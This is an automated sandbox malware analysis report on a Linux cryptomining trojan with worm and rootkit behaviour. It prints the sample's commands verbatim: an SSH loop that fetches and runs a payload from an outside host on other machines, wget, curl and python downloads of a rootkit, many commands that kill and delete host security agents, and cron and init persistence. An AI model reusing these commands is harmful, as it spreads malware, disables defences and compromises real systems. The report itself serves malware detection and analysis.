
Analysis Report 1EC6U55yrZ

Overview

General Information

Joe Sandbox Version: 26.0
Analysis ID: 901718
Start date: 02.07.2019
Start time: 07:47:36
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 8m 11s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 1EC6U55yrZ
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal100.spre.troj.evad.mine.lin@0/42@22/0
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Detection
Threshold | 100   | 0 - 100 | Report FP / FN | false       | malicious

Classification

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Local Job Scheduling (2) | Local Job Scheduling (2) | Port Monitors | Rootkit (1) | Credential Dumping | Security Software Discovery (11) | SSH Hijacking (1) | Data from Local System (1) | Data Encrypted (1) | Standard Cryptographic Protocol (1)
Replication Through Removable Media | Command-Line Interface (11) | Hidden Files and Directories (1) | Accessibility Features | Hidden Files and Directories (1) | Network Sniffing | File and Directory Discovery (1) | Remote File Copy (1) | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy (1)
Drive-by Compromise | Scripting (13) | .bash_profile and .bashrc (1) | Path Interception | Disabling Security Tools (1) | Input Capture | Query Registry | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol (3)
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Scripting (13) | Credentials in Files | System Network Configuration Discovery | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol (23)
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | File Deletion (11) | Account Manipulation | Remote System Discovery | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol

(Numbers in parentheses are the count of matching signatures per technique.)

Signature Overview

Bitcoin Miner:

Found strings related to Crypto-Mining
Source: 1EC6U55yrZ | String found in binary or memory: flags=("stratum+tcp" "cryptonight" "supportxmr.com" "minexmr.com" "poolin.com" "dwarfpool.com" "nanopool.com" "f2pool.com")

Spreading:

Found strings indicative of a multi-platform dropper
Source: 1EC6U55yrZ | String: declare -a down_method_arr=("wget" "curl" "python" "tcp")
Source: 1EC6U55yrZ | String: echo "for i in \`cat /tmp/.h\` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no \`whoami\`@\$i \"wget -c -O /tmp/$ShellProceName $DownloadURL_shell;curl -o /tmp/$ShellProceName $DownloadURL_shell;python -c \\\"import urllib;urllib.urlretrieve(\\\\\\\"$DownloadURL_shell\\\\\\\", \\\\\\\"/tmp/$ShellProceName\\\\\\\")\\\";php -r '\\\$f=fopen(\\\"'/tmp/$ShellProceName'\\\",\\\"w\\\");fwrite(\\\$f, implode(\\\"\\\",@file(\\\"'$DownloadURL_shell'\\\")));fclose(\\\$f);';chmod 755 /tmp/$ShellProceName;(exec /tmp/$ShellProceName &> /dev/null &)\" &> /dev/null &); done" >> /tmp/.helpdd
Source: .helpdd.34.dr | String: for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '\$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite(\$f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose(\$f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)" &> /dev/null &); done
Sample spreads through ssh
Source: /bin/sh (PID: 21967) | Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@192.168.3.32 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21973) | Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@8.8.8.8 "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"
Source: /bin/sh (PID: 21982) | Command: ssh -oStrictHostKeyChecking=no -oCheckHostIP=no root@install "wget -c -O /tmp/diskmanagerd http://auth.to0ls.com/shell;curl -o /tmp/diskmanagerd http://auth.to0ls.com/shell;python -c \"import urllib;urllib.urlretrieve(\\\"http://auth.to0ls.com/shell\\\", \\\"/tmp/diskmanagerd\\\")\";php -r '$f=fopen(\"'/tmp/diskmanagerd'\",\"w\");fwrite($f, implode(\"\",@file(\"'http://auth.to0ls.com/shell'\")));fclose($f);';chmod 755 /tmp/diskmanagerd;(exec /tmp/diskmanagerd &> /dev/null &)"

Networking:

Executes the "wget" command typically used for HTTP/S downloading
Source: /bin/bash (PID: 22572) | Wget executable: /usr/bin/wget -> wget -O /tmp/.../brootkit.sh http://auth.to0ls.com/l/tiktoor/brootkit.sh
Source: /bin/bash (PID: 22614) | Wget executable: /usr/bin/wget -> wget -O /tmp/.../install.sh http://auth.to0ls.com/l/tiktoor/install.sh
Source: /bin/bash (PID: 23684) | Wget executable: /usr/bin/wget -> wget -O /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /l/ver.txt HTTP/1.0
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
    GET /l/tiktoor/brootkit.sh HTTP/1.1
    User-Agent: Wget/1.17.1 (linux-gnu)
    Accept: */*
    Accept-Encoding: identity
    Host: auth.to0ls.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /l/tiktoor/install.sh HTTP/1.1
    User-Agent: Wget/1.17.1 (linux-gnu)
    Accept: */*
    Accept-Encoding: identity
    Host: auth.to0ls.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /l/ver.txt HTTP/1.1
    User-Agent: Wget/1.17.1 (linux-gnu)
    Accept: */*
    Accept-Encoding: identity
    Host: auth.to0ls.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /l/ver.txt HTTP/1.1
    Host: auth.to0ls.com
    User-Agent: curl/7.47.0
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /l/ver.txt HTTP/1.0
    Host: auth.to0ls.com
    User-Agent: Python-urllib/1.17
Source: global traffic | HTTP traffic detected:
    GET /l/ver.txt HTTP/1.0
Source: global traffic | HTTP traffic detected:
    GET /l/sodd/syn HTTP/1.1
    User-Agent: Wget/1.17.1 (linux-gnu)
    Accept: */*
    Accept-Encoding: identity
    Host: auth.to0ls.com
    Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: auth.to0ls.com
Urls found in memory or binary data
Source: 1EC6U55yrZ | String found in binary or memory: http://$remote_host/l/ver.txt
Source: .helpdd.34.dr | String found in binary or memory: http://auth.to0ls.com/shell
Source: .helpdd.34.dr | String found in binary or memory: http://auth.to0ls.com/shell;curl
Source: .helpdd.34.dr | String found in binary or memory: http://auth.to0ls.com/shell;python
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 42308 -> 443

System Summary:

Sample contains strings that are potentially command strings
Source: Initial sample | Potential command found: service safedog stop >/dev/null 2>&1
Source: Initial sample | Potential command found: rmmod sddev >/dev/null 2>&1
Source: Initial sample | Potential command found: sleep 3
Source: Initial sample | Potential command found: killall -9 sdmonitor >/dev/null 2>&1
Source: Initial sample | Potential command found: killall sdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: killall udcenter >/dev/null 2>&1
Source: Initial sample | Potential command found: killall sdcmd >/dev/null 2>&1
Source: Initial sample | Potential command found: killall sdsvrd >/dev/null 2>&1
Source: Initial sample | Potential command found: killall sdacm >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/sd_uninstall >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/init.d/sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/init.d/safedog >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/init.d/sdboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/init.d/udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc2.d/S99udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc3.d/S99udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc4.d/S99udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc5.d/S99udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc2.d/S99sdboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc3.d/S99sdboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc4.d/S99sdboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/rc5.d/S99sdboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdmonitor >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sd_autoexmn >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/runsdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/udcenter >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/udpro >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdalarm >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdsetos >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/safedog_uninstall >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /usr/bin/safedog >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /usr/bin/sdboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdstart >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdsvrd >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdwebdir >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdrtdefendupdate >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdcmd >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdtest >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdui >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sduibin >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdcloud >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/udinstall >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdacm >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/sdrepo >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/uduninstall >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /usr/bin/SDDownload >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/sdinfo.conf >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/udcenter.conf >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/libs/safedog >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/libs/sdcommon >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/libs/sdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/cloudhelper >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/init.d/sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/init.d/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/init.d/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/init.d/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/init.d/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/rc2.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/rc3.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/rc4.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/rc5.d/S99sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/sdcc/bin/sdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /usr/bin/sdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/sdcc/script/runsdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /usr/bin/runsdcc >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/sdcc/script/sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /usr/bin/sdccboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/safedog/logs/sdcc.log >/dev/null 2>&1
Source: Initial sample | Potential command found: killall udpro>/dev/null 2>&1 >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/safedog/sdcc/script/udboot >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/safedog/sdcc/bin/udcenter >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/safedog/sdcc/bin/udpro >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/safedog/sdcc/bin/sdalarm >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/safedog/server/script/sdsetos >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/safedog/script/safedog_uninstall >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -rf /etc/sd_uninstall/ >/dev/null 2>&1
Source: Initial sample | Potential command found: killall sduibin >/dev/null 2>&1
Source: Initial sample | Potential command found: killall -9 aegis_cli >/dev/null 2>&1
Source: Initial sample | Potential command found: killall -9 aegis_update >/dev/null 2>&1
Source: Initial sample | Potential command found: killall -9 AliYunDun >/dev/null 2>&1
Source: Initial sample | Potential command found: killall -9 AliHids >/dev/null 2>&1
Source: Initial sample | Potential command found: killall -9 AliYunDunUpdate >/dev/null 2>&1
Source: Initial sample | Potential command found: rm -f /etc/init.d/aegis
Source: Initial sample | Potential command found: rm -f "/etc/runlevels/default/aegis" >/dev/null 2>&1;
Source: Initial sample | Potential command found: rm -f "/etc/rc2.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc3.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc4.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc5.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc.d/rc2.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc.d/rc3.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc.d/rc4.d/S80aegis"
Source: Initial sample | Potential command found: rm -f "/etc/rc.d/rc5.d/S80aegis"
Classification label
Source: classification engine | Classification label: mal100.spre.troj.evad.mine.lin@0/42@22/0

Persistence and Installation Behavior:

Detected Linux Brootkit rootkit
Source: brootkit.sh.1192.dr | IOC string 'BR_ROOTKIT_PATH' found: BR_ROOTKIT_PATH="/usr/include/..."
Source: install.sh.837.dr | IOC string 'BR_ROOTKIT_PATH' found: BR_ROOTKIT_PATH="/home/$USER/..."
Source: install.sh.837.dr | IOC string 'BR_ROOTKIT_PATH' found: mkdir -p $BR_ROOTKIT_PATH -m 0777
Source: install.sh.837.dr | IOC string 'BR_ROOTKIT_PATH' found: cp brootkit.sh $BR_ROOTKIT_PATH
Source: install.sh.837.dr | IOC string 'BR_ROOTKIT_PATH' found: chmod 777 $BR_ROOTKIT_PATH
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /lib/systemd/system-generators/lvm2-activation-generator (PID: 22427) | File: /proc/22427/mounts
Sample tries to persist itself using /etc/profile
Source: /bin/cp (PID: 23641) | File: /etc/profile.d/emacs.sh
Sample tries to persist itself using System V runlevels
Source: /bin/bash (PID: 19422) | File: /etc/rc.local
Source: /bin/ln (PID: 22275) | File: /etc/rcS.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22278) | File: /etc/rc0.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22282) | File: /etc/rc1.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22287) | File: /etc/rc2.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22294) | File: /etc/rc3.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22299) | File: /etc/rc4.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22306) | File: /etc/rc5.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /bin/ln (PID: 22313) | File: /etc/rc6.d/S90diskmanagerd -> /etc/init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc0.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc1.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc1.d/S03single -> ../init.d/single
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc2.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc3.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc4.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc5.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rc6.d/S02diskmanagerd -> ../init.d/diskmanagerd
Source: /usr/lib/insserv/insserv (PID: 22367) | File: /etc/rcS.d/S02diskmanagerd -> ../init.d/diskmanagerd
Sample tries to persist itself using cron
Source: /bin/bash (PID: 19422) | File: /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 19422) | File: /etc/crontab
Sets full permissions to files and/or directories
Source: /bin/bash (PID: 19368) | Chmod executable with 777: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 19496) | Chmod executable with 777: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 22554) | Chmod executable with 777: /bin/chmod -> chmod 777 /tmp/...
Source: /tmp/.../install.sh (PID: 23638) | Chmod executable with 777: /bin/chmod -> chmod 777 /usr/include/...
Creates hidden files and/or directories
Source: /bin/mkdir (PID: 19367) | Directory: ...
Source: /bin/mkdir (PID: 19495) | Directory: ...
Source: /bin/mkdir (PID: 22550) | Directory: ...
Source: /bin/mkdir (PID: 23617) | Directory: ...
Executes python code directly via command shell that might indicate malicious behavior
Source: /bin/bash (PID: 23739) | Python code executed via command shell: /usr/bin/python -> python -c "import urllib;urllib.urlretrieve('http://auth.to0ls.com/l/ver.txt', '/tmp/vxbkyxrlq2hly2s')"
Executes the "chmod" command used to modify permissions
Source: /bin/bash (PID: 19368) | Chmod executable: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 19413) | Chmod executable: /bin/chmod -> chmod 755 /usr/lib/.../diskmanagerd
Source: /bin/bash (PID: 19496) | Chmod executable: /bin/chmod -> chmod 777 /usr/lib/...
Source: /bin/bash (PID: 21709) | Chmod executable: /bin/chmod -> chmod +x /tmp/.helpdd
Source: /bin/bash (PID: 22267) | Chmod executable: /bin/chmod -> chmod 755 /etc/init.d/diskmanagerd
Source: /bin/bash (PID: 22536) | Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/gcc4lef.sh
Source: /bin/bash (PID: 22554) | Chmod executable: /bin/chmod -> chmod 777 /tmp/...
Source: /bin/bash (PID: 22651) | Chmod executable: /bin/chmod -> chmod 755 /tmp/.../brootkit.sh
Source: /bin/bash (PID: 22652) | Chmod executable: /bin/chmod -> chmod 755 /tmp/.../install.sh
Source: /tmp/.../install.sh (PID: 23638) | Chmod executable: /bin/chmod -> chmod 777 /usr/include/...
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/bash (PID: 23711) | Curl executable: /usr/bin/curl -> curl -o /tmp/vxbkyxrlq2hly2s http://auth.to0ls.com/l/ver.txt
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/bash (PID: 19341) | Grep executable: /bin/grep -> grep PING
Source: /bin/bash (PID: 19384) | Grep executable: /bin/grep -> grep [Cc]ent[Oo][Ss]
Source: /bin/bash (PID: 19400) | Grep executable: /bin/grep -> grep [Uu]buntu
Source: /bin/bash (PID: 19468) | Grep executable: /bin/grep -> grep PING
Source: /bin/bash (PID: 19499) | Grep executable: /bin/grep -> grep [Cc]ent[Oo][Ss]
Source: /bin/bash (PID: 19501) | Grep executable: /bin/grep -> grep [Uu]buntu
Source: /bin/bash (PID: 19504) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19505) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19513) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19514) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19548) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19549) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19565) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19566) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19585) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19586) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19618) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19619) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19640) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19641) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19677) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19678) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19709) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19710) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19749) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19750) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19764) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19765) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19797) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19798) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19828) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19829) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19864) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19865) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19884) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19885) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19916) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19917) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19949) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19950) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 19981) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 19982) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20016) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20017) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20050) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20051) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20082) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20083) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20114) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20115) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20148) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20149) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20179) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20180) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20211) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20212) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20226) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20227) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20257) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20258) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20281) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20282) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20313) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20314) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20333) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20337) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20366) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20367) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20401) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20402) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20435) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20436) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20463) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20464) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20481) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20482) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20516) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20517) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20551) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20552) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20565) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20566) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20600) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20601) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20625) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20626) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20647) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20648) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20680) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20681) | Grep executable: /bin/grep -> grep /bin/bash
Source: /bin/bash (PID: 20716) | Grep executable: /bin/grep -> grep exe
Source: /bin/bash (PID: 20717) | Grep executable: /bin/grep -> grep /bin/bash
